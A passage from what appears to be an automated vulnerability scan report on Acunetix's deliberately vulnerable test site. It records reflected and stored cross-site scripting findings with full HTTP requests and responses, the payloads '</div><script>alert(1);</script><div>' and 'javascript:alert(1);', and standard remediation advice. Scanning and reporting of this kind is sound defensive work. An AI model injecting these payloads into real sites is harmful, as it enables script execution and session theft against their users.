href="javascript:__doPostBack('RightPanel1$Calendar','8235')" style="color:Black" title="July 19">19</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8236')" style="color:Black" title="July 20">20</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8237')" style="color:Black" title="July 21">21</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8238')" style="color:Black" title="July 22">22</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8239')" style="color:Black" title="July 23">23</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8240')" style="color:Black" title="July 24">24</a></td><td align="center" style="border-color:#806640;width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8241')" style="color:Black" title="July 25">25</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8242')" style="color:Black" title="July 26">26</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8243')" style="color:Black" title="July 27">27</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8244')" style="color:Black" title="July 28">28</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8245')" style="color:Black" title="July 29">29</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8246')" style="color:Black" title="July 30">30</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8247')" style="color:Black" title="July 31">31</a></td><td align="center" style="width:14%;"><a 
href="javascript:__doPostBack('RightPanel1$Calendar','8248')" style="color:Black" title="August 01">1</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8249')" style="color:Black" title="August 02">2</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8250')" style="color:Black" title="August 03">3</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8251')" style="color:Black" title="August 04">4</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8252')" style="color:Black" title="August 05">5</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8253')" style="color:Black" title="August 06">6</a></td></tr>
          </table><BR>
          <a href="rssFeed.aspx">Get RSS feed</a>
          
          					</TD>
          				</TR>
          				<TR>
          					<TD colSpan="2"></TD>
          				</TR>
          			</TABLE>
          		</form>
          	</body>
          	<div style="background-color:lightgray;width:40%;margin:auto;bottom:2px;text-align:center;font-size:12px;padding:1px">
          		<p style="padding-left:5%;padding-right:5%"><b>Warning</b>: This is not a blog. This is a test site for Acunetix. It is vulnerable to SQL Injections, Cross-site Scripting (XSS), and more. It was built using ASP.NET and it shows how bad programming leads to vulnerabilities. Do not visit the links in the comments. They are posted by malicious parties who are trying to exploit this site to their advantage. Comments are purged daily.</p>
          	</div>
          </HTML>
          
          Parameter
          tbComment
          Attack
          </div><script>alert(1);</script><div>
          Solution

          Phase: Architecture and Design

          Use a vetted library or framework that does not allow this weakness to occur or provides constructs that make this weakness easier to avoid.

          Examples of libraries and frameworks that make it easier to generate properly encoded output include Microsoft's Anti-XSS library, the OWASP ESAPI Encoding module, and Apache Wicket.

          Phases: Implementation; Architecture and Design

          Understand the context in which your data will be used and the encoding that will be expected. This is especially important when transmitting data between different components, or when generating outputs that can contain multiple encodings at the same time, such as web pages or multi-part mail messages. Study all expected communication protocols and data representations to determine the required encoding strategies.

          For any data that will be output to another web page, especially any data that was received from external inputs, use the appropriate encoding on all non-alphanumeric characters.

          Consult the XSS Prevention Cheat Sheet for more details on the types of encoding and escaping that are needed.

          Phase: Architecture and Design

          For any security checks that are performed on the client side, ensure that these checks are duplicated on the server side, in order to avoid CWE-602. Attackers can bypass the client-side checks by modifying values after the checks have been performed, or by changing the client to remove the client-side checks entirely. Then, these modified values would be submitted to the server.

          If available, use structured mechanisms that automatically enforce the separation between data and code. These mechanisms may be able to provide the relevant quoting, encoding, and validation automatically, instead of relying on the developer to provide this capability at every point where output is generated.

          Phase: Implementation

          For every web page that is generated, use and specify a character encoding such as ISO-8859-1 or UTF-8. When an encoding is not specified, the web browser may choose a different encoding by guessing which encoding is actually being used by the web page. This can cause the web browser to treat certain sequences as special, opening up the client to subtle XSS attacks. See CWE-116 for more mitigations related to encoding/escaping.

          To help mitigate XSS attacks against the user's session cookie, set the session cookie to be HttpOnly. In browsers that support the HttpOnly feature (such as more recent versions of Internet Explorer and Firefox), this attribute can prevent the user's session cookie from being accessible to malicious client-side scripts that use document.cookie. This is not a complete solution, since HttpOnly is not supported by all browsers. More importantly, XMLHTTPRequest and other powerful browser technologies provide read access to HTTP headers, including the Set-Cookie header in which the HttpOnly flag is set.

          Assume all input is malicious. Use an "accept known good" input validation strategy, i.e., use an allow list of acceptable inputs that strictly conform to specifications. Reject any input that does not strictly conform to specifications, or transform it into something that does. Do not rely exclusively on looking for malicious or malformed inputs (i.e., do not rely on a deny list). However, deny lists can be useful for detecting potential attacks or determining which inputs are so malformed that they should be rejected outright.

          When performing input validation, consider all potentially relevant properties, including length, type of input, the full range of acceptable values, missing or extra inputs, syntax, consistency across related fields, and conformance to business rules. As an example of business rule logic, "boat" may be syntactically valid because it only contains alphanumeric characters, but it is not valid if you are expecting colors such as "red" or "blue."

          Ensure that you perform input validation at well-defined interfaces within the application. This will help protect the application even if a component is reused or moved elsewhere.

      2. Cross Site Scripting (Reflected) (3)
        1. GET http://testaspnet.vulnweb.com/ReadNews.aspx?NewsAd=javascript%3Aalert%281%29%3B&id=2
          Alert tags
          Alert description

          Cross-site Scripting (XSS) is an attack technique that involves echoing attacker-supplied code into a user's browser instance. A browser instance can be a standard web browser client, or a browser object embedded in a software product such as the browser within WinAmp, an RSS reader, or an email client. The code itself is usually written in HTML/JavaScript, but may also extend to VBScript, ActiveX, Java, Flash, or any other browser-supported technology.

          When an attacker gets a user's browser to execute his/her code, the code will run within the security context (or zone) of the hosting web site. With this level of privilege, the code has the ability to read, modify and transmit any sensitive data accessible by the browser. A Cross-site Scripted user could have his/her account hijacked (cookie theft), their browser redirected to another location, or possibly shown fraudulent content delivered by the web site they are visiting. Cross-site Scripting attacks essentially compromise the trust relationship between a user and the web site. Applications utilizing browser object instances which load content from the file system may execute code under the local machine zone allowing for system compromise.

          There are three types of Cross-site Scripting attacks: non-persistent, persistent and DOM-based.

          Non-persistent attacks and DOM-based attacks require a user to either visit a specially crafted link laced with malicious code, or visit a malicious web page containing a web form, which when posted to the vulnerable site, will mount the attack. Using a malicious form will oftentimes take place when the vulnerable resource only accepts HTTP POST requests. In such a case, the form can be submitted automatically, without the victim's knowledge (e.g. by using JavaScript). Upon clicking on the malicious link or submitting the malicious form, the XSS payload will get echoed back and will get interpreted by the user's browser and execute. Another technique to send almost arbitrary requests (GET and POST) is by using an embedded client, such as Adobe Flash.

          Persistent attacks occur when the malicious code is submitted to a web site where it's stored for a period of time. Examples of an attacker's favorite targets often include message board posts, web mail messages, and web chat software. The unsuspecting user is not required to interact with any additional site/link (e.g. an attacker site or a malicious link sent via email), just simply view the web page containing the code.

          Request
          Request line and header section (377 bytes)
          GET http://testaspnet.vulnweb.com/ReadNews.aspx?NewsAd=javascript%3Aalert%281%29%3B&id=2 HTTP/1.1
          Host: testaspnet.vulnweb.com
          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0
          Pragma: no-cache
          Cache-Control: no-cache
          Referer: http://testaspnet.vulnweb.com
          Cookie: ASP.NET_SessionId=s1yels3ja2tusr45pvgdn232
          Content-Length: 0
          
          
          Request body (0 bytes)
          Response
          Status line and header section (222 bytes)
          HTTP/1.1 200 OK
          Cache-Control: private
          Content-Type: text/html; charset=utf-8
          Server: Microsoft-IIS/8.5
          X-AspNet-Version: 2.0.50727
          X-Powered-By: ASP.NET
          Date: Mon, 25 Jul 2022 13:07:27 GMT
          Content-Length: 30484
          
          
          Response body (30484 bytes)
          
          <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" >
          <HTML>
          	<HEAD>
          		<title>ReadNews</title>
          		<meta content="Microsoft Visual Studio .NET 7.1" name="GENERATOR">
          		<meta content="C#" name="CODE_LANGUAGE">
          		<meta content="JavaScript" name="vs_defaultClientScript">
          		<meta content="http://schemas.microsoft.com/intellisense/ie5" name="vs_targetSchema">
          		<LINK href="styles.css" type="text/css" rel="stylesheet">
          	</HEAD>
          	<body>
          		<form name="Form1" method="post" action="ReadNews.aspx?NewsAd=javascript%3aalert(1)%3b&amp;id=2" id="Form1">
          <div>
          <input type="hidden" name="__EVENTTARGET" id="__EVENTTARGET" value="" />
          <input type="hidden" name="__EVENTARGUMENT" id="__EVENTARGUMENT" value="" />
          <input type="hidden" name="__VIEWSTATE" id="__VIEWSTATE" value="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" />
          </div>
          
          <script type="text/javascript">
          //<![CDATA[
          var theForm = document.forms['Form1'];
          if (!theForm) {
              theForm = document.Form1;
          }
          function __doPostBack(eventTarget, eventArgument) {
              if (!theForm.onsubmit || (theForm.onsubmit() != false)) {
                  theForm.__EVENTTARGET.value = eventTarget;
                  theForm.__EVENTARGUMENT.value = eventArgument;
                  theForm.submit();
              }
          }
          //]]>
          </script>
          
          
          <div>
          
          	<input type="hidden" name="__VIEWSTATEGENERATOR" id="__VIEWSTATEGENERATOR" value="532053C5" />
          	<input type="hidden" name="__EVENTVALIDATION" id="__EVENTVALIDATION" value="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" />
          </div>
          			
          <TABLE id="Table1" cellSpacing="0" cellPadding="5" width="790" align="center" border="0">
          	<TR>
          		<TD style="COLOR: #e6dccf" bgColor="#806640" height="75"><a href="https://www.acunetix.com/"><IMG src="images/logo_acunetix.gif" align="absMiddle" border="0" alt="Acunetix website security"></a></TD>
          		<TD style="FONT-WEIGHT: bold; FONT-SIZE: small; COLOR: #e6dccf" align="right" bgColor="#806640"
          			height="75">Test Website for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></TD>
          	</TR>
          </TABLE>
          <TABLE id="Table2" cellSpacing="0" cellPadding="5" width="790" align="center" border="0">
          	<TR>
          		<TD class="MenuBar" style="BORDER-LEFT: #806040 1px solid"><A class="menu" title="About" href="about.aspx">about</A>
          			<A class="menu" title="Latest news" href="default.aspx">news</A> <a href="login.aspx" id="MainMenu1_lnkLog" class="menu" name="lnkLog">login</a>  <a href="Signup.aspx" id="MainMenu1_lnkSignup" class="menu" name="lnkSignup">
          				signup</a> <A class="menu" title="Network scanner" href="https://www.acunetix.com/vulnerability-scanner/network-vulnerability-scanner/">network scanner</A>
          				<A class="menu" title="Network vuln help" href="https://www.acunetix.com/blog/articles/network-vulnerability-assessment-gotchas-avoid/">network vuln help</A>
          		</TD>
          		<td class="MenuBar" align="right" width="50px">
          			<A href="rssFeed.aspx"><IMG src="images/rss.gif" border="0"></A>
          		</td>
          	</TR>
          </TABLE>
          
          			<TABLE id="Table1" cellSpacing="0" cellPadding="10" width="790" align="center" border="0">
          				<TR>
          					<TD vAlign="top">
          						<DIV id="divNewsDate" class="NewsDate">posted by <strong>admin                    </strong>11/8/2005 11:35:22 AM</DIV>
          						<DIV id="divNewsTitle" class="NewsTitle">Web attacks - can your web applications withstand the force?</DIV>
          						<DIV id="divNewsLong" class="NewsLong"><p><strong>Acunetix combats rise in web attacks with Acunetix                            Web Vulnerability Scanner 2 </strong></p>                           <p>21 July 2005 - <strong>Start-up company Acunetix released                            Acunetix Web Vulnerability Scanner: a tool to automatically                            audit website security. Acunetix Web Vulnerability Scanner                            2 crawls an entire website, launches popular web attacks                            (SQL Injection etc.) and identifies vulnerabilities                            that need to be fixed.</strong> </p>                           <p><strong>Securing your website should be your number one                            concern</strong><br />                           Hackers are concentrating their efforts on web-based                            applications - 75% of cyber attacks are done at the                            web application level, a Gartner Group study has revealed.                            Web applications are accessible 24 hours a day, 7 days                            a week and control valuable data such as customer information,                            transaction information and even proprietary corporate                            data.</p>                           <p><strong>500,000 customer credit card numbers obtained via                            a web attack</strong><br />                           Well-known sites that were open to web application attacks                            include fashion label Guess and pet supply retailer                            PetCo.com who were notoriously found to be vulnerable                            to the SQL injection vulnerability (June 2003). 
This                            resulted in PetCo leaving as many as 500,000 credit                            card numbers open to anyone able to construct this specially-crafted                            URL.</p>                           <p><strong>Firewalls, SSL and locked-down servers are futile                            against web application hacking</strong><br />                           Any defense at network security level will provide no                            protection against web application attacks since they                            are launched on port 80 - which has to remain open.                            In addition, web applications (customer areas, shopping                            carts etc.) are often tailor-made, invariably tested                            less than off-the-shelf software and are therefore more                            susceptible to attack.</p>                           <p>&quot;Companies have implemented network-level security,                            however they fail to audit and secure their web applications.                            These applications have access to sensitive data and                            are a hacker's prime target,&quot; said Nick Galea,                            CEO of Acunetix. &quot;Auditing one's web apps should                            be the number one security concern.&quot;</p>                           <p><strong>The need for an automated web application vulnerability                            scanner</strong><br />                           Manually auditing a web application for vulnerabilities                            to SQL injection, cross site scripting and other web                            attacks is virtually impossible. With Acunetix Web Vulnerability                            Scanner the process of auditing web applications such                            as shopping carts and forms, can be easily automated.                            
What's more, the security checks can easily be re-launched                            for each application update.</p>                           <p><strong>How Acunetix Web Vulnerability Scanner works</strong><br />                           Acunetix WVS first crawls the whole website, analyzes                            in-depth each file it finds, and displays the entire                            website structure. After this discovery stage, it performs                            an automatic audit for common security vulnerabilities.</p>                           <p><strong>Automatically detects SQL injection, cross site                            scripting and other web vulnerabilities</strong><br />                           SQL injection is a hacking technique which modifies                            SQL commands in order to gain access to data in the                            database. Cross site scripting attacks allow a hacker                            to execute a malicious script on your visitors' browser.                            Acunetix Web Vulnerability Scanner can check if your                            web application is vulnerable to both of these attacks.                            
More information about cross site scripting &amp; SQL                            injection at our website security info page.</p>                           <p><strong>Acunetix Web Vulnerability Scanner also checks for                            the following web attacks:</strong></p>                           <ul> <li>CRLF injection attacks<br />                           </li><li>Code execution attacks<br />                           </li><li>Directory traversal attacks<br />                           </li><li>File inclusion attacks<br />                           </li><li> Input validation attacks<br />                           </li><li>Authentication attacks.</li> </ul>                           <p><strong>Advanced penetration testing tools</strong><br />                           Acunetix WVS also includes tools such as an HTTP editor                            &amp; HTTP sniffer to allow customization of web vulnerability                            checks. Using the Vulnerability editor, new attacks                            can easily be created.</p>                           <p><strong>Pricing &amp; availability</strong><br />                           Acunetix WVS is available as an enterprise or as a consultant                            version. A subscription based license can be purchased                            for as little as $395, whereas a perpetual license starts                            at $2995. For more information visit our pricing page.</p>                           <p><strong>About Acunetix</strong></p>     <p>User-friendly and competitively priced, Acunetix leads the market in automatic web security testing technology. Its industry-leading crawler fully supports HTML5, JavaScript, and AJAX-heavy websites, enabling the auditing of complex, authenticated applications. Acunetix provides the only technology on the market that can automatically detect out-of-band vulnerabilities and is available both as an online and on-premises solution. 
Acunetix also includes integrated vulnerability management features to extend the enterprise&rsquo;s ability to comprehensively manage, prioritize, and control vulnerability threats &ndash; ordered by business criticality.</p></DIV>
          						<TABLE id="Table2" cellSpacing="0" cellPadding="0" width="500" border="0">
          							<TR>
          								<TD vAlign="bottom"><IMG src="images/comment-before.gif"></TD>
          							</TR>
          							<TR>
          								<TD class="Comment" vAlign="middle">
          									<a id="hlComments" href="Comments.aspx?id=2">Read user comments</a></TD>
          							</TR>
          							<TR>
          								<TD vAlign="top"><IMG src="images/comment-after.gif"></TD>
          							</TR>
          						</TABLE>
          						<center>
          						<iframe id="adsFrame" src="javascript:alert(1);" width="200" height="110" style="BORDER-RIGHT: lemonchiffon 1px solid; BORDER-TOP: lemonchiffon 1px solid; BORDER-LEFT: lemonchiffon 1px solid; BORDER-BOTTOM: lemonchiffon 1px solid" frameBorder="no" scrolling="no"></iframe>
          						</center>
          					</TD>
          					<TD vAlign="top" width="200" colSpan="2">
          						<table id="RightPanel1_Calendar" class="Calendar" cellspacing="0" cellpadding="1" title="Calendar" border="0" style="background-color:#E6DCCF;border-width:1px;border-style:Solid;font-size:X-Small;border-collapse:collapse;">
          	<tr><td colspan="7" style="background-color:#E6B873;"><table class="Calendar" cellspacing="0" border="0" style="font-size:X-Small;font-weight:bold;width:100%;border-collapse:collapse;">
          		<tr><td style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8187')" style="color:Black" title="Go to the previous month">&lt;</a></td><td align="center" style="width:70%;">July 2022</td><td align="right" style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8248')" style="color:Black" title="Go to the next month">&gt;</a></td></tr>
          	</table></td></tr><tr><th align="center" abbr="Sunday" scope="col">Sun</th><th align="center" abbr="Monday" scope="col">Mon</th><th align="center" abbr="Tuesday" scope="col">Tue</th><th align="center" abbr="Wednesday" scope="col">Wed</th><th align="center" abbr="Thursday" scope="col">Thu</th><th align="center" abbr="Friday" scope="col">Fri</th><th align="center" abbr="Saturday" scope="col">Sat</th></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8212')" style="color:Black" title="June 26">26</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8213')" style="color:Black" title="June 27">27</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8214')" style="color:Black" title="June 28">28</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8215')" style="color:Black" title="June 29">29</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8216')" style="color:Black" title="June 30">30</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8217')" style="color:Black" title="July 01">1</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8218')" style="color:Black" title="July 02">2</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8219')" style="color:Black" title="July 03">3</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8220')" style="color:Black" title="July 04">4</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8221')" style="color:Black" title="July 05">5</a></td><td align="center" style="width:14%;"><a 
href="javascript:__doPostBack('RightPanel1$Calendar','8222')" style="color:Black" title="July 06">6</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8223')" style="color:Black" title="July 07">7</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8224')" style="color:Black" title="July 08">8</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8225')" style="color:Black" title="July 09">9</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8226')" style="color:Black" title="July 10">10</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8227')" style="color:Black" title="July 11">11</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8228')" style="color:Black" title="July 12">12</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8229')" style="color:Black" title="July 13">13</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8230')" style="color:Black" title="July 14">14</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8231')" style="color:Black" title="July 15">15</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8232')" style="color:Black" title="July 16">16</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8233')" style="color:Black" title="July 17">17</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8234')" style="color:Black" title="July 18">18</a></td><td align="center" style="width:14%;"><a 
href="javascript:__doPostBack('RightPanel1$Calendar','8235')" style="color:Black" title="July 19">19</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8236')" style="color:Black" title="July 20">20</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8237')" style="color:Black" title="July 21">21</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8238')" style="color:Black" title="July 22">22</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8239')" style="color:Black" title="July 23">23</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8240')" style="color:Black" title="July 24">24</a></td><td align="center" style="border-color:#806640;width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8241')" style="color:Black" title="July 25">25</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8242')" style="color:Black" title="July 26">26</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8243')" style="color:Black" title="July 27">27</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8244')" style="color:Black" title="July 28">28</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8245')" style="color:Black" title="July 29">29</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8246')" style="color:Black" title="July 30">30</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8247')" style="color:Black" title="July 31">31</a></td><td align="center" style="width:14%;"><a 
href="javascript:__doPostBack('RightPanel1$Calendar','8248')" style="color:Black" title="August 01">1</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8249')" style="color:Black" title="August 02">2</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8250')" style="color:Black" title="August 03">3</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8251')" style="color:Black" title="August 04">4</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8252')" style="color:Black" title="August 05">5</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8253')" style="color:Black" title="August 06">6</a></td></tr>
          </table><BR>
          <a href="rssFeed.aspx">Get RSS feed</a>
          
          					</TD>
          				</TR>
          				<TR>
          					<TD colSpan="3"></TD>
          				</TR>
          			</TABLE>
          		</form>
          	</body>
          	<div style="background-color:lightgray;width:40%;margin:auto;left:30%;position:fixed;bottom:2px;text-align:center;font-size:12px;padding:1px">
          		<p style="padding-left:5%;padding-right:5%"><b>Warning</b>: This is not a blog. This is a test site for Acunetix. It is vulnerable to SQL Injections, Cross-site Scripting (XSS), and more. It was built using ASP.NET and it shows how bad programming leads to vulnerabilities. Do not visit the links in the comments. They are posted by malicious parties who are trying to exploit this site to their advantage. Comments are purged daily.</p>
          	</div>
          </HTML>
          
          Parameter
          NewsAd
          Attack
          javascript:alert(1);
          Evidence
          javascript:alert(1);
          Solution

          Phase: Architecture and Design

          Use a vetted library or framework that does not allow this weakness to occur, or that makes it easy to avoid.

          Examples of libraries and frameworks that make it easier to generate properly encoded output include Microsoft's Anti-XSS library, the OWASP ESAPI Encoding module, and Apache Wicket.

          Phases: Implementation; Architecture and Design

          Understand the context in which your data will be used and the encoding that will be expected. This is especially important when transmitting data between different components, or when generating outputs that can contain multiple encodings at the same time, such as web pages or multi-part mail messages. Study all expected communication protocols and data representations to determine the required encoding strategies.

          For any data that will be output to another web page, especially any data that was received from external inputs, use the appropriate encoding on all non-alphanumeric characters.

          Consult the XSS Prevention Cheat Sheet for more details on the types of encoding and escaping that are needed.

          Phase: Architecture and Design

          For any security checks that are performed on the client side, ensure that these checks are duplicated on the server side, in order to avoid CWE-602. Attackers can bypass the client-side checks by modifying values after the checks have been performed, or by changing the client to remove the client-side checks entirely. Then, these modified values would be submitted to the server.

          If available, use structured mechanisms that automatically enforce the separation between data and code. These mechanisms may be able to provide the relevant quoting, encoding, and validation automatically, instead of relying on the developer to provide this capability at every point where output is generated.

          Phase: Implementation

          For every web page that is generated, use and specify a character encoding such as ISO-8859-1 or UTF-8. When an encoding is not specified, the web browser may choose a different encoding by guessing which encoding is actually being used by the web page. This can cause the web browser to treat certain sequences as special, opening up the client to subtle XSS attacks. See CWE-116 for more mitigations related to encoding/escaping.

          To help mitigate XSS attacks against the user's session cookie, set the session cookie to be HttpOnly. In browsers that support the HttpOnly feature (such as more recent versions of Internet Explorer and Firefox), this attribute can prevent the user's session cookie from being accessible to malicious client-side scripts that use document.cookie. This is not a complete solution, since HttpOnly is not supported by all browsers. More importantly, XMLHttpRequest and other powerful browser technologies provide read access to HTTP headers, including the Set-Cookie header in which the HttpOnly flag is set.

          Assume all input is malicious. Use an "accept known good" input validation strategy, i.e., use an allow list of acceptable inputs that strictly conform to specifications. Reject any input that does not strictly conform to specifications, or transform it into something that does. Do not rely exclusively on looking for malicious or malformed inputs (i.e., do not rely on a deny list). However, deny lists can be useful for detecting potential attacks or determining which inputs are so malformed that they should be rejected outright.

          When performing input validation, consider all potentially relevant properties, including length, type of input, the full range of acceptable values, missing or extra inputs, syntax, consistency across related fields, and conformance to business rules. As an example of business rule logic, "boat" may be syntactically valid because it only contains alphanumeric characters, but it is not valid if you are expecting colors such as "red" or "blue."

          Ensure that you perform input validation at well-defined interfaces within the application. This will help protect the application even if a component is reused or moved elsewhere.

        2. POST http://testaspnet.vulnweb.com/Comments.aspx?id=2
          Alert tags
          Alert description

          Cross-site Scripting (XSS) is an attack technique that involves echoing attacker-supplied code into a user's browser instance. A browser instance can be a standard web browser client, or a browser object embedded in a software product such as the browser within WinAmp, an RSS reader, or an email client. The code itself is usually written in HTML/JavaScript, but may also extend to VBScript, ActiveX, Java, Flash, or any other browser-supported technology.

          When an attacker gets a user's browser to execute his/her code, the code will run within the security context (or zone) of the hosting web site. With this level of privilege, the code has the ability to read, modify and transmit any sensitive data accessible by the browser. A Cross-site Scripted user could have his/her account hijacked (cookie theft), their browser redirected to another location, or possibly shown fraudulent content delivered by the web site they are visiting. Cross-site Scripting attacks essentially compromise the trust relationship between a user and the web site. Applications utilizing browser object instances which load content from the file system may execute code under the local machine zone allowing for system compromise.

          There are three types of Cross-site Scripting attacks: non-persistent, persistent and DOM-based.

          Non-persistent attacks and DOM-based attacks require a user to either visit a specially crafted link laced with malicious code, or visit a malicious web page containing a web form, which when posted to the vulnerable site, will mount the attack. Using a malicious form will oftentimes take place when the vulnerable resource only accepts HTTP POST requests. In such a case, the form can be submitted automatically, without the victim's knowledge (e.g. by using JavaScript). Upon clicking on the malicious link or submitting the malicious form, the XSS payload will get echoed back and will get interpreted by the user's browser and execute. Another technique to send almost arbitrary requests (GET and POST) is by using an embedded client, such as Adobe Flash.

          Persistent attacks occur when the malicious code is submitted to a web site where it's stored for a period of time. Examples of an attacker's favorite targets often include message board posts, web mail messages, and web chat software. The unsuspecting user is not required to interact with any additional site/link (e.g. an attacker site or a malicious link sent via email), just simply view the web page containing the code.

          Request
          Request line and header section (413 bytes)
          POST http://testaspnet.vulnweb.com/Comments.aspx?id=2 HTTP/1.1
          Host: testaspnet.vulnweb.com
          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0
          Pragma: no-cache
          Cache-Control: no-cache
          Content-Type: application/x-www-form-urlencoded
          Referer: http://testaspnet.vulnweb.com/Comments.aspx?id=2
          Content-Length: 1784
          Cookie: ASP.NET_SessionId=s1yels3ja2tusr45pvgdn232
          
          
          Request body (1784 bytes)
